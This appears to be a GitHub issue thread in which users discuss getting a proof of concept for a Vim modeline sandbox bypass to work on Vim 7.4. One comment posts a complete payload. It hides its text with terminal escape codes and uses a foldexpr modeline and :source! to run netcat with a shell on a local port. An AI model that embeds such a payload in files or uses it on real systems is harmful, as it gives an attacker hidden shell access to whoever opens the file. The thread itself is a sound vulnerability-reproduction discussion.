How to construct poc on vim74?
Larryxi opened this issue · comments
Hi,
I realize that function assert_fails
is added in version 8, does that mean vim74 is not affected by this vulnerability, or how could I construct poc on vim74?
Thanks
Try replacing assert_fails()
with execute()
. The sandbox bypass is based on the :source!
command. assert_fails()
and execute()
are just ways to run it.
Is it true?
^[[?7l^[SNothing here.^[:silent! w | call system('nohup nc 127.0.0.1 9999 -e /bin/sh &') | redraw! | file | silent! # " vim: set fen fdm=expr fde=execute('set\ fde=x\ \ |\ source\!\ \%') fdl=0: ^V^[[1G^V^[[KNothing here."^V^[[D
Ah, my bad. Actually, execute()
also isn't implemented back in 7.4, so this won't work either. Off the top of my head, I can't give you can example how to make the poc compatible with 7.4, but there likely is some way.
So how do I reproduce this bug in vim72?
I also could not produce this issue in version 7.4.1689. If anyone can re-produce this for this version then please let me know.
PS: I could make it work on NVIM v0.3.5-11-g1060bfd03.
let check it out